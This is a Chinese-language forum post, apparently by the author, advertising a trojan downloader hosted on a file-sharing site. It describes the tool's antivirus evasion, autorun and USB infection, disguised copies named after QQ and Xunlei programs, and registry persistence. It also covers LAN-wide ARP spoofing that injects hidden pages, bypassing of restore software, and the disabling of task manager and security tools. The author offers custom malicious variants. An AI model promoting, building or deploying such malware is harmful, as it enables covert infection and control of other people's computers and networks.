让你的木马永不被查杀,即使被杀也没关系,当电脑再次重启后下载者会再次下载你指定的木马 目前可以过瑞星卡巴等等一系列杀软,即使你的木马不免杀也可以长时间保证不丢鸡,呵呵!!!
请在下载地址内写上你要下载的木马地址
注意格式正确
autorun自动感染
U盘自动感染
内网欺骗
机器狗变种技术穿透还原
=================================================================================
下载者运行后 首先检测D:\autorun.inf是否存在 没则感染 并强制注销让AUTORUN生效
所以首次运行会强制注销 双击硬盘又会将自身激活,此次激活如果AUTORUN被删除或被专杀杀掉将会再次感染并且强制注销 (所有盘符里的AUTORUN文件都不同,下载者本身存放地址也不同 分别为c:\Administrator\system_temp.exe d:\tencent\qq\qq.exe e:\Plogram Files\Common Files\Real\Update_OB\realsched.exe f:\Sandai\xunlei.exe )其中D 和 E盘 360安全卫士会被认为是安全
项目。 注册表加入了4个启动
项目 除非一次性关掉 不然的话又会被激活 (在虚拟机测试的朋友如果你的虚拟机没有D盘 下载者无法使用哦)
感染成功后下载木马,开始ARP欺骗 1.0免费版本的欺骗地址为
www.baidu.com 如果你在网吧或者内网测试的话 只要你的下载者运行了 网吧游戏系统不是网维大师 并且没有开启ARP防火墙的话 所有机器打开网页在源文件第1行将会看到被插入了隐藏的BAIDU网页 (有兴趣的朋友可以加我QQ为你定做一个你带你网页木马地址的ARP欺骗)
机器狗变种技术穿透还原 穿常见版本的 还原精灵 冰点 网维大师 能穿到6.1.2.0 (现在最新版本是6122 暂无任何方法穿透)
机器重启后 强制关闭查看文件隐藏功能 (除非用批处理开) 强制关闭任务管理器 强制关闭360 机器狗 字样的窗口
===================================================================================
第1次发布。呵呵 功能很实用。当然 如果您的机器没有D盘 本下载者不起任何作用。隐藏激活本身的条件非常多。
因为论坛不能上传附件,所以我只能发到网络硬盘上去了 有兴趣的朋友可以进行测试 网盘地址:
http://zxxzj.ys168.com/
